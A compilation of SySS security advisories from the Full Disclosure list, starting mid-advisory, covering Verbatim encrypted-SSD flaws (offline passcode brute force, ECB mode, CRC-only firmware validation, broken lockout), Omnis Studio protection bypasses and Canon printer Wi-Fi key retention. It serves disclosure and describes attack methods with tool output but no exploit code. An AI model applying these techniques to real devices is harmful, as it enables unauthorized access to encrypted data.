the firmware of the INIC-3637EN reads and decrypts the special sector on the SSD with the provided KEK and checks specific data offsets for the known byte pattern (signature) "0x20 0x49 0x4E 0x49" which represents the string " INI". If this byte pattern could successfully be found, the entered passcode and its derived AES key is very likely correct and grants the firmware access to the decrypted DEK, which can then be used to decrypt the actual SSD user data. This described design of the Verbatim Store 'n' Go Secure Portable SSD allows for offline brute-force attacks for finding the correct passcode, because an attacker can generate and observe the derived AES keys (KEK) of the keypad for all possible passcodes and then try to correctly decrypt the data of a specific SSD sector. If the magic byte pattern " INI" can be detected in the expected places of the resulting plaintext, the correct passcode is found, which then allows for gaining unauthorized access to the encrypted user data. Proof of Concept (PoC): For demonstrating the offline brute-force attack, Matthias Deeg developed a sample brute-forcing software tool which checks the complete search space of all possible passcodes between five and twelve digits. The following output exemplarily shows a successful attack. >VKSCracker.exe _ _ _ __ _ __ | | | | | / // ___| / __ \ | | | | | | |/ / \ `--. | / \/_ __ __ _ ___| | _ _ __ | | | |\ `--. \ | | | '__/ _` |/ __| |/ / _ \ '__| \ \_/ / |\ \/\__/ / | \__/\ | | (_| | (__| < __/ | \___/\_| \_/\/ \/_| \__,_|\___|_|\_\___|_| ... finds out your passcode. Verbatim Keypad Secure Cracker v0.6 by Matthias Deeg (c) 2022 --- [*] Found 8 l
[FD] [SYSS-2022-044]: Verbatim Store 'n' Go Secure Portable SSD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28382)
Advisory ID: SYSS-2022-044 Product: Store 'n' Go Secure Portable SSD Manufacturer: Verbatim Affected Version(s): #53402 (GDMSLK02 C-INIC3637-V1.1) Tested Version(s): #53402 (GDMSLK02 C-INIC3637-V1.1) Vulnerability Type:Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) Risk Level:Low Solution Status: Fixed Manufacturer Notification: 2022-06-29 Solution Date: 2022-07 Public Disclosure: 2022-10-07 CVE Reference: CVE-2022-28382 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Store 'n' Go Secure Portable SSD is a portable USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for password input. The hard drive does not store passwords in the computer or system’s volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the hard drive will lock and require re-formatting after 20 failed password attempts."[1] Due to the use of an insecure encryption AES mode (Electronic Codebook), an attacker may be able to extract information even from encrypted data, for example by observing repeating byte patterns. Vulnerability Details: When analyzing the external storage device Verbatim Store 'n' Go Secure Portable SSD, Matthias Deeg found out that the firmware of the USB-to-SATA bridge controller INIC-3637EN uses AES-256 with the ECB (Electronic Codebook) mode. This operation mode of block ciphers like AES encrypts identical plaintext data, in this case blocks of 16 bytes, always to identical ciphertext data. For some data, for instance bitmap images, the lack of the cryptographic property called diffusion concerning the ECB mode can leak sensitive information even in encrypted data. One famous example for this is an ECB-encrypted image of the TUX penguin, which, for instance, is referenced in the Wikipedia article about block cipher modes of operation[2] to illustrate this issue. Thus, the use of the ECB operation mode can put the confidentiality of specific information at risk, even in an encrypted form. Additionally, in attack scenarios where an attacker has short-time physical access to a Verbatim Store 'n' Go Portable Secure SSD, and later returns it to its legitimate owner, the attacker may be able to compromise the integrity of the stored data by exploiting the fact that the same 16-byte plaintext blocks result in the same 16-byte ciphertext blocks, by replacing specific encrypted 16-byte blocks with other ones. Proof of Concept (PoC): The same plaintext pattern with the length of 16 bytes was written several times to an unlocked Verbatim Store 'n' Go Secure Portable SSD. When the SSD was then read using another SSD enclosure, the same 16 byte long ciphertext pattern could be observed for the corresponding plaintext data. Solution: The described security issue was fixed by the Verbatim "Security Update July 2022"[4]. Disclosure Timeline: 2022-06-29: Vulnerability reported to manufacturer 2022-07 : Manufacturer publishes security update[4] 2022-10-07: Public release of security advisory References: [1] Product website for Verbatim Store 'n' Go Secure Portable SSD https://www.verbatim-europe.co.uk/en/prod/store-n-go-portable-ssd-with-keypad-access-256gb-53402/ [2] Wikipedia article about block cipher mode of operation https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB) [3] SySS Security Advisory SYSS-2022-044 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-044.txt [4] Security Update July 2022: Store 'n' Go Portable SSD https://www.verbatim-europe.co.uk/en/support-centre/?part_no=53402 [5] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The
[FD] [SYSS-2022-045]: Verbatim Store 'n' Go Secure Portable SSD - Missing Immutable Root of Trust in Hardware (CWE-1326) (CVE-2022-28383)
Advisory ID: SYSS-2022-045 Product: Store 'n' Go Secure Portable SSD Manufacturer: Verbatim Affected Version(s): #53402 (GDMSLK02 C-INIC3637-V1.1) Tested Version(s): #53402 (GDMSLK02 C-INIC3637-V1.1) Vulnerability Type:Missing Immutable Root of Trust in Hardware (CWE-1326) Risk Level:Medium Solution Status: Fixed Manufacturer Notification: 2022-06-29 Solution Date: - Public Disclosure: 2022-10-07 CVE Reference: CVE-2022-28383 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Store 'n' Go Secure Portable SSD is a portable USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for password input. The hard drive does not store passwords in the computer or system’s volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the hard drive will lock and require re-formatting after 20 failed password attempts."[1] Due to insufficient firmware validation, an attacker can store malicious firmware code for the USB-to-SATA bridge controller on the external drive, which gets executed. Vulnerability Details: When analyzing the external data storage Verbatim Store 'n' Go Secure Portable SSD, Matthias Deeg found out that the validation of the firmware for the USB-to-SATA bridge controller INIC-3637EN only consists of a simple CRC-16 check (XMODEM CRC-16). Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip (XT25F01D), which then gets successfully executed by the USB-to-SATA bridge controller. For instance, this security vulnerability could be exploited in a so-called "supply chain attack" when the device is still on its way to its legitimate user. An attacker with temporary physical access during the supply could program a modified firmware on the Verbatim Keypad Secure, which always uses an attacker-controlled AES key for the data encryption, for example. If, later on, the attacker gains access to the used USB drive, he can simply decrypt all contained user data. Proof of Concept (PoC): SySS was able to read and write the SPI flash memory containing the firmware of the INIC-3637EN controller (128 KB) using a universal programmer. By analyzing the dumped memory content, SySS found out that the INIC-3637EN firmware is stored from the file offset 0x4000 to the file offset 0x1BFFB, and that the corresponding XMODEM CRC-16 is stored at the file offset 0x1FFFC. Matthias Deeg developed a simple Python tool for updating the checksum of modified firmware images before writing them to the SPI flash memory chip. The following output exemplarily shows updating a modified firmware image: $ python update-firmaware.py firmware_hacked.bin Verbatim Store 'n' Go Firmware Updater v0.1 - Matthias Deeg, SySS GmbH (c) 2022 [*] Computed CRC-16 (0x0874) does not match stored CRC-16 (0x5E8C). [*] Successfully updated firmware file Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-06-29: Vulnerability reported to manufacturer 2022-10-07: Public release of security advisory References: [1] Product website for Verbatim Store 'n' Go Secure Portable SSD https://www.verbatim.com.au/products/store-n-go-portable-ssd-with-keypad-access/ [2] SySS Security Advisory SYSS-2022-045 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-045.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this
[FD] [SYSS-2022-046]: Verbatim Store 'n' Go Secure Portable SSD - Expected Behavior Violation (CWE-440) (CVE-2022-28386)
Advisory ID: SYSS-2022-046 Product: Store 'n' Go Secure Portable SSD Manufacturer: Verbatim Affected Version(s): #53402 (GDMSLK02 C-INIC3637-V1.1) Tested Version(s): #53402 (GDMSLK02 C-INIC3637-V1.1) Vulnerability Type:Expected Behavior Violation (CWE-440) Risk Level:Low Solution Status: Open Manufacturer Notification: 2022-06-29 Solution Date: - Public Disclosure: 2022-10-07 CVE Reference: CVE-2022-28386 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Store 'n' Go Secure Portable SSD is a portable USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for password input. The hard drive does not store passwords in the computer or system’s volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the hard drive will lock and require re-formatting after 20 failed password attempts."[1] The security feature for locking and requiring to reformat the SSD after 20 failed unlock attempts does not work as specified. Vulnerability Details: When analyzing the external data storage Verbatim Store 'n' Go Secure Portable SSD, Matthias Deeg found out that the device will not lock and require reformatting after 20 failed passcode attempts, as described in the product description[1] and the corresponding user manual. Thus, an attacker with physical access to such an external SSD can try more passcodes in order to unlock the device. During the security analysis, SySS could not find out how many failed passcode attempts would actually lock the device and require reformatting it, as this device state was never reached. Additionally, trying to find out the correct passcode by either manually or automatically entering it via the provided keypad is rather insufficient compared to an equally possible offline brute-force attack, as described in SySS security advisory SYSS-2022-043[2]. Proof of Concept (PoC): SySS tried to unlock the Verbatim Store 'n' Go Secure Portable SSD with more than 20 consecutively entered wrong passcodes. Afterwards, contrary to the product description, the external SSD could still be successfully unlocked with the correct passcode, and access to the previously stored data was possible without any issues. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-06-29: Vulnerability reported to manufacturer 2022-10-07: Public release of security advisory References: [1] Product website for Verbatim Store 'n' Go Secure Portable SSD https://www.verbatim.com.au/products/store-n-go-portable-ssd-with-keypad-access/ [2] SySS Security Advisory SYSS-2022-043 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-043.txt [3] SySS Security Advisory SYSS-2022-046 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-046.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en OpenPGP_signature Description: OpenPGP digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [SYSS-2023-005]: Omnis Studio - Expected Behavior Violation (CWE-440) (CVE-2023-38335)
Advisory ID: SYSS-2023-005 Product: Omnis Studio Manufacturer: Omnis Software Ltd. Affected Version(s): 10.22.00 Tested Version(s): 10.22.00 Vulnerability Type:Expected Behavior Violation (CWE-440) Risk Level:Low Solution Status: Open Manufacturer Notification: 2023-03-30 Solution Date: - Public Disclosure: 2023-07-20 CVE Reference: CVE-2023-38335 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: Omnis Studio is a rapid application development tool for developing cross-platform software applications. The manufacturer describes the product as follows: "Omnis Studio is a powerful development environment that lets you deploy apps to virtually any device, on any platform, including tablets, smartphones, and desktop computers." [1] Due to implementation issues, "always private" Omnis libraries can be opened by the Omnis Studio browser. Vulnerability Details: Omnis Studio supports a feature for making Omnis libraries "always private". Making an Omnis library "always private" is supposed to be an irreversible operation according to the Omnis Studio software. However, during a security analysis of an application developed with Omnis Studio using this feature, Matthias Deeg found out that it is still possible to load "always private" Omnis libraries with the Omnis Studio browser by simply bypassing a specific check. This violates the expected behavior of an "irreversible operation". Proof of Concept (PoC): For demonstrating the described security issue, Matthias Deeg developed a proof-of-concept software tool which allows loading private Omnis libraries in the Omnis Studio browser. >OmnisUnlocker.exe _ /_ _ _ \ // ___| / ___/ ___| \ | \ `--. _ _\ `--.\ `--. | | `--. \ | | |`--. \`--. \ | | /\__/ / |_| /\__/ /\__/ / | \\/ \__, \/\/ ... unlocks Omnis Studio! / \ __/ | / / |___/ __/ / _/ (__) /_/ (oo) /--\/ / |____|| * || || ^^ ^^ SySS Omnis Unlocker v1.0 by Matthias Deeg - (c) 2023 [+] The Omnis Studio process was patched successfully. Now you can: * load private Omnis libraries in the browser, and * analyze locked classes. This security issue is also demonstrated in our SySS Proof of Concept Video "Reversing the Irreversible - Part I" on our YouTube channel [3]. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2023-03-30: Vulnerability reported to manufacturer 2023-04-06: Vulnerability reported to manufacturer again 2023-07-20: Public release of security advisory References: [1] Product website for Omnis Studio https://www.omnis.net/ [2] SySS Security Advisory SYSS-2023-005 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-005.txt [3] SySS Proof of Concept Video: Reversing the Irreversible - Part I https://www.youtube.com/watch?v=2fjMgPqjobQ [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc Key Fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en OpenPGP_signature Description: OpenPGP digital signature ___
[FD] [SYSS-2023-006]: Omnis Studio - Expected Behavior Violation (CWE-440) (CVE-2023-38334)
Advisory ID: SYSS-2023-006 Product: Omnis Studio Manufacturer: Omnis Software Ltd. Affected Version(s): 10.22.00 Tested Version(s): 10.22.00 Vulnerability Type:Expected Behavior Violation (CWE-440) Risk Level:Low Solution Status: Open Manufacturer Notification: 2023-03-30 Solution Date: - Public Disclosure: 2023-07-20 CVE Reference: CVE-2023-38334 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: Omnis Studio is a rapid application development tool for developing cross-platform software applications. The manufacturer describes the product as follows: "Omnis Studio is a powerful development environment that lets you deploy apps to virtually any device, on any platform, including tablets, smartphones, and desktop computers."[1] Due to implementation issues, locked classes in Omnis libraries can be unlocked and thus further analyzed and modified via the Omnis Studio browser. Vulnerability Details: Omnis Studio supports an irreversible feature for locking classes within Omnis libraries. According to the Omnis Studio software, it should be no longer possible to delete, view, change, copy, rename, duplicate, or print a locked class. However, during a security analysis of an application developed with Omnis Studio using this feature, Matthias Deeg found out that it is possible to unlock previously locked classes of Omnis libraries, for instance by simply bypassing specific checks in Omnis Studio. This allows for further analyzing and also deleting, viewing, changing, copying, renaming, duplicating, or printing previously locked Omnis classes. This violates the expected behavior of an "irreversible operation". Proof of Concept (PoC): For demonstrating the described security issue, Matthias Deeg developed a proof-of-concept software tool which allows unlocking locked classes within Omnis libraries and further analyzing and modifying them within Omnis Studio. >OmnisUnlocker.exe _ /_ _ _ \ // ___| / ___/ ___| \ | \ `--. _ _\ `--.\ `--. | | `--. \ | | |`--. \`--. \ | | /\__/ / |_| /\__/ /\__/ / | \\/ \__, \/\/ ... unlocks Omnis Studio! / \ __/ | / / |___/ __/ / _/ (__) /_/ (oo) /--\/ / ||| * || || ^^ ^^ SySS Omnis Unlocker v1.0 by Matthias Deeg - (c) 2023 [+] The Omnis Studio process was patched successfully. Now you can: * load private Omnis libraries in the browser, and * analyze locked classes. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2023-03-30: Vulnerability reported to manufacturer 2023-04-06: Vulnerability reported to manufacturer again 2023-07-20: Public release of security advisory References: [1] Product website for Omnis Studio https://www.omnis.net/ [2] SySS Security Advisory SYSS-2023-006 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-006.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc Key Fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en OpenPGP_signature Description: OpenPGP digital signature ___ Sent through the F
[FD] [SYSS-2023-011]: Canon PIXMA TR4550 and other inkjet printer models - Insufficient or Incomplete Data Removal, within Hardware Component (CWE-1301)
Advisory ID: SYSS-2023-011 Product: PIXMA TR4550 Manufacturer: Canon Affected Version(s): 1.020 / 1.080 also affects many other Canon inkjet printer models[4] Tested Version(s): 1.020 / 1.080 Vulnerability Type:Insufficient or Incomplete Data Removal within Hardware Component (CWE-1301) Insufficiently Protected Credentials (CWE-522) Risk Level:Low Solution Status: Fixed Manufacturer Notification: 2023-04-06 Solution Date: 2023-07-31 Public Disclosure: 2023-08-03 CVE Reference: No CVE ID from Canon PSIRT Author of Advisory:Manuel Stotz, SySS GmbH Overview: The Canon PIXMA TR4550 is an entry-level 4-in-1 printer equipped with Wi-Fi connectivity. The manufacturer describes the product as follows (see [1]): "Ready to adapt to your smart home office environment, this efficient 4-In-One printer requires minimal space but gives maximum support to your projects. Whether scanning a document, copying an ID, faxing an invoice or printing posters, PIXMA TR4550 has the functionality to keep up with your business needs. Equipped with smart Wi-Fi connectivity to optimise management of functions and features, this front-loading 4-In-One printer is the compact solution that saves space, streamlines ink usage and brings productivity to the forefront." The unprotected storage of credentials and insufficient data removal during a factory reset allows sensitive data to be read out afterward. Vulnerability Details: The Canon PIXMA TR4550 stores sensitive data, such as the SSID and the Wi-Fi pre-shared key (PSK), unencrypted in its persistent storage (EEPROM). Resetting the product to factory settings (via 'Setup', 'Device settings', 'Reset setting' and 'All data') does not securely delete this sensitive information. Proof of Concept (PoC): SySS could successfully perform a proof-of-concept attack via the following steps: * Configure and establish a Wi-Fi connection. * Reset all data (Setup, Device settings, Reset setting, All data). * Disassemble the printer and locate the EEPROM on the PCB. * Create an EEPROM memory dump. * Search and locate the configured SSID and PSK in the memory dump. Solution: Canon PSIRT published its security advisory "Vulnerability Mitigation/Remediation for Inkjet Printers (Home and Office/Large Format)" (CP2023-003)[3] describing how sensitive information should be deleted concerning the affected printers[5]. Disclosure Timeline: 2023-04-06: Vulnerability reported to manufacturer 2023-04-12: Canon PSIRT creates ticket 2023-04-27: Update from Canon concerning ongoing analysis 2023-05-15: Canon confirms security issue 2023-05-23: Agreement on public disclosure date 2023-07-17: Canon PSIRT informs about scheduled publication of their security advisory 2023-07-31: Canon PSIRT publishes their security advisory "Vulnerability Mitigation/Remediation Format Inkjet Printers (Home and Office/Large Format)" (CP2023-003)[3] 2023-08-03: Public release of SySS security advisory References: [1] Product website for Canon PIXMA TR4550 https://www.canon-europe.com/support/consumer/products/printers/pixma/tr-series/pixma-tr4550.html [2] SySS Security Advisory SYSS-2023-011 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-011.txt [3] CP2023-003 Vulnerability Mitigation/Remediation for Inkjet Printers (Home and Office/Large Format) https://psirt.canon/advisory-information/cp2023-003/ [4] List of affected printers https://canon.a.bigcontent.io/v1/static/affected-models_20230731_d04c0d9895124b65acd21ca68357dcdc [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Manuel Stotz of SySS GmbH. E-Mail: manuel.stotz (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc Key Fingerprint: F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest
